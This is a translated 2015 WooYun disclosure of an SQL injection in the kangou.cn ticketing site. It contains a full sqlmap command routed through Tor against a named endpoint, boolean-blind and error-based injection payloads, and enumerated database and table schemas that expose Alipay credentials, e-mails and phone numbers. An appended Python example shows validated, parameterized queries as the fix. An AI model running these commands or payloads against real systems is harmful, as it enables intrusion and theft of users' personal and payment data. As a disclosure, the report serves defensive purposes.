
Defect ID: wooyun-2015-0144698

Title: SQL injection on 看购网 (kangou.cn) could expose sensitive data of hundreds of thousands of users

Affected vendor: 看购网

Reporter: 路人甲

Submitted: 2015-10-04 10:12

Fix time: 2015-11-18 10:14

Public disclosure: 2015-11-18 10:14

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: vendor could not be contacted, or vendor actively ignored the report

Source: http://www.wooyun.org. For questions or assistance, contact [email protected]



Vulnerability details

Disclosure status:

2015-10-04: Actively contacting the vendor and waiting for the vendor to claim the report; details withheld from the public
2015-11-18: Vendor has actively ignored the report; details disclosed to the public

Summary:

看购网 has a SQL injection that could expose sensitive data of hundreds of thousands of users.

Details:

看购网 has a SQL injection that could expose sensitive data of hundreds of thousands of users.

Proof of concept:

This only proves the vulnerability exists; no user data was dumped.

./sqlmap.py --tor --tor-type=SOCKS5 --random-agent --time-sec=20 --technique=BEU --union-char=N -u "http://bbs.kangou.cn/cinema/cinemainfo.aspx" --data="id=389ec2da-eabb-421c-806d-e39cb77dbf44&prid=e3e0410e-7999-49ac-8ed6-076f4988c3ab" --dbs --is-dba --current-db


---
Parameter: id (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=389ec2da-eabb-421c-806d-e39cb77dbf44' AND 6955=6955 AND 'UMSL'='UMSL&prid=e3e0410e-7999-49ac-8ed6-076f4988c3ab
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: id=389ec2da-eabb-421c-806d-e39cb77dbf44' AND 3088=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(112)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (3088=3088) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(106)+CHAR(106)+CHAR(113))) AND 'gSXv'='gSXv&prid=e3e0410e-7999-49ac-8ed6-076f4988c3ab
---
current database: 'lookango'
current user is DBA: False
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
available databases [11]:
[*] filminfo
[*] lkgimage
[*] lookango
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[*] test1
[*] test2
Database: lookango
[113 tables]
+--------------------------------+
| DU_Applications |
| DU_Articles |
<...omitted...>
| LKG_Gift |
| LKG_GiftCard |
| LKG_GiftCardBuy |
| LKG_GiftCardBuyOrder |
| LKG_GiftCardDiscount |
+--------------------------------+
In one table I found, remarkably, Alipay account IDs together with passwords:
+---------------------+------------------+
| Column | Type |
+---------------------+------------------+
| AlipayID | nvarchar |
<...quite something...>
| UserAlipayPass | nvarchar |
Database: lookango
Table: LKG_API_UserDatas
[12 columns]
+---------------------+------------------+
| Column | Type |
+---------------------+------------------+
| API_Log_CardTID | uniqueidentifier |
| API_Log_Mail | nvarchar | ===> user e-mail
| API_Log_Mobile | nvarchar | ===> user mobile number
| API_Log_TicketCount | int |
| API_LogEvent | nvarchar |
| API_LogHashcodeIn | nvarchar |
| API_LogHashcodeOut | nvarchar |
| API_LogTime | datetime |
| API_UserID | nvarchar |
| API_UserIP | nvarchar |
| API_UserLogID | uniqueidentifier |
| API_UserOrderID | nvarchar |
+---------------------+------------------+
[14:55:04] [INFO] retrieved: 1185391
Database: lookango
+-----------------------+---------+
| Table | Entries |
+-----------------------+---------+
| dbo.LKG_API_UserDatas | 1185391 | ===> over a million rows
+-----------------------+---------+
Database: lookango
Table: LKG_CardOrders
[43 columns]
+---------------------------------+------------------+
| Column | Type |
+---------------------------------+------------------+
| billOrgId_i | nvarchar |
| CardCode | nvarchar |
| CardOrderCount | int |
| CardOrderID | uniqueidentifier |
| CardOrderIDCard | nvarchar |
| CardOrderMail | nvarchar | ===> user e-mail
| CardOrderMoneyBackBalanceAfter | int |
| CardOrderMoneyBackBalanceBefore | int |
| CardOrderMoneyBackTime | datetime |
| CardOrderMoneyBackUserID | int |
| CardOrderMoneyIsBack | bit |
| CardOrderMonth | int |
| CardOrderNumber | nvarchar |
| CardOrderPassword | nvarchar |
| CardOrderPayKind | int |
| CardOrderPayTime | datetime |
| CardOrderPhone | nvarchar | ===> user phone number
| CardOrderPrice | int |
| CardOrderStatus | nvarchar |
| CardOrderTime | datetime |
| CardTongKindPosID |
| CheapCardID | uniqueidentifier |
| CheapPrice | int |
| CheapPriceBefore | int |
| CinemaId | uniqueidentifier |
| GHCardNumber | nvarchar |
| MaiZuoCinemaId | int |
| MaiZuoMaizuoSeq | nvarchar |
| MaiZuoRandCode | nvarchar |
| MaiZuoRemainingCount | int |
| MaiZuoResultMsg | nvarchar |
| MaiZuoStatus | int |
| MaiZuoTime | datetime |
| MerchantID | uniqueidentifier |
| merSysId | nvarchar |
| RelationUserID | uniqueidentifier |
| TuanGouID | uniqueidentifier |
| UserID | uniqueidentifier |
| UserIP | nvarchar |
| yinliangateId | nvarchar |
| yinlianUserId | nvarchar |
| YL_Order | nvarchar |
| yl_order_i | nvarchar |
+---------------------------------+------------------+
[15:23:12] [INFO] retrieved: 235359
Database: lookango
+--------------------+---------+
| Table | Entries |
+--------------------+---------+
| dbo.LKG_CardOrders | 235359 | ===> hundreds of thousands of rows
+--------------------+---------+

Recommended fix:

Filter the input.
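The report's fix is a single word. As an added example (not from the report, and not 看购网's own code), the following Python sketch shows why type validation plus parameter binding, rather than blacklist filtering, is the durable fix for this bug class: the boolean-based blind payload sqlmap recorded above changes the result set of a string-concatenated query, but is rejected outright once `id` must parse as a UUID and is bound as a parameter. The `cinema` table, its single row, the `lookup_*` functions and the "false" variant of the payload are constructed for the demo; SQLite stands in for the site's SQL Server, and the pattern is the same on any DBMS.

```python
import sqlite3
import uuid

# The id value from the report's sqlmap command.
CINEMA_ID = "389ec2da-eabb-421c-806d-e39cb77dbf44"

# The boolean-based blind payload sqlmap recorded (true branch), and a
# constructed false variant: the only difference is 6955=6955 vs 6955=6956.
TRUE_PAYLOAD = CINEMA_ID + "' AND 6955=6955 AND 'UMSL'='UMSL"
FALSE_PAYLOAD = CINEMA_ID + "' AND 6955=6956 AND 'UMSL'='UMSL"


def make_db():
    """Constructed stand-in for the table behind cinemainfo.aspx (hypothetical schema)."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE cinema (id TEXT PRIMARY KEY, name TEXT)")
    con.execute("INSERT INTO cinema VALUES (?, ?)", (CINEMA_ID, "Sample Cinema"))
    return con


def lookup_concat(con, cinema_id):
    """Vulnerable pattern: the request parameter is spliced into the SQL text.
    Everything after the attacker's closing quote is parsed as SQL, so the
    truth of the injected condition decides whether the row comes back. That
    difference in the response is exactly the oracle a blind injection uses."""
    sql = f"SELECT name FROM cinema WHERE id = '{cinema_id}'"
    return [row[0] for row in con.execute(sql)]


def lookup_param(con, cinema_id):
    """Hardened pattern: the id column is a GUID, so anything that does not
    parse as one is rejected before any SQL runs; the canonical value is then
    bound as a parameter, so the DBMS never interprets it as SQL text."""
    try:
        canonical = str(uuid.UUID(cinema_id))
    except ValueError:
        return None  # caller maps this to HTTP 400
    sql = "SELECT name FROM cinema WHERE id = ?"
    return [row[0] for row in con.execute(sql, (canonical,))]


def demo():
    """Run both patterns against the legitimate id and the recorded payload."""
    con = make_db()
    return {
        "concat_true": lookup_concat(con, TRUE_PAYLOAD),    # row returned
        "concat_false": lookup_concat(con, FALSE_PAYLOAD),  # no row: the oracle
        "param_legit": lookup_param(con, CINEMA_ID),        # row returned
        "param_payload": lookup_param(con, TRUE_PAYLOAD),   # rejected as non-UUID
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name}: {result!r}")
```

In the ASP.NET application described in the report, the equivalent is `Guid.TryParse` on the request value followed by a `SqlParameter` of type `SqlDbType.UniqueIdentifier` on the `SqlCommand`; a keyword blacklist (the usual meaning of "filtering") would have to anticipate every encoding the payload above can take, whereas a typed, bound parameter leaves nothing for the database to parse.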

Copyright notice: when reposting, please credit the source: 路人甲@乌云


Vulnerability response

Vendor response:

Vendor could not be contacted, or vendor actively declined to respond.